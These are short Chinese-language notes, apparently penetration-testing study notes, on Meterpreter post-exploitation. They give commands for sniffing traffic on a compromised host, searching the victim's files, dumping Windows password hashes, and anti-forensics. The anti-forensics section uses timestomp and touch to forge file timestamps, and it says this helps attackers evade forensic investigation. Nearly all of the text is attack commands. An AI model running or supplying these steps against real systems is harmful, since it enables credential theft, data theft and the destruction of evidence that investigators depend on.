抓包

• load sniffer
• sniffer_interfaces
• sniffer_start 2
• sniffer_dump 2 1.cap /
• 在内存中缓存区块循环存储抓包，不写硬盘
• 智能过滤meterpreter流量，传输全程使用SSL/TLS加密

解码

• use auxiliary/sniffer/psnuffle
• set PCAPFILE 1.cap

搜索

• search -f *.ini
• search -d c\\documents\ and\ settings\\administrator\desktop\ -f *.docx

破解弱口令密码

• meterpreter->hashdump即可获得用户名密码，但是用下面的模块

• use post/windows/gather/hashdump #system权限的meterpreter，如果是弱密码，则会直接显示密码明文

痕迹消除

• 文件系统访问会留下痕迹，电子取证重点关注

• 渗透测试和攻击者往往希望销毁文件系统访问痕迹

• 最好的避免被电子取证发现的方法：不要碰文件系统

  • meterpreter的先天优势：完全基于内存

• MAC时间（Modified/Accessed/Changed）

  • ls -l –time=xxxx
  • stat 1.txt
  • touch -d “2 days ago” 1.txt
  • touch -t 1501010101 1.txt

• timestomp

  • timestomp 1.txt -t template.txt

• MACE：MFT entry

  • MFT：NTFS文件系统的主文件分配表 Master File Table
  • 通常1024字节或2个硬盘扇区，其中存放多项entry信息
  • 包含文件大量信息（大小、名称、目录位置、磁盘位置、创建日期）
  • 更多信息可研究 文件系统取证分析技术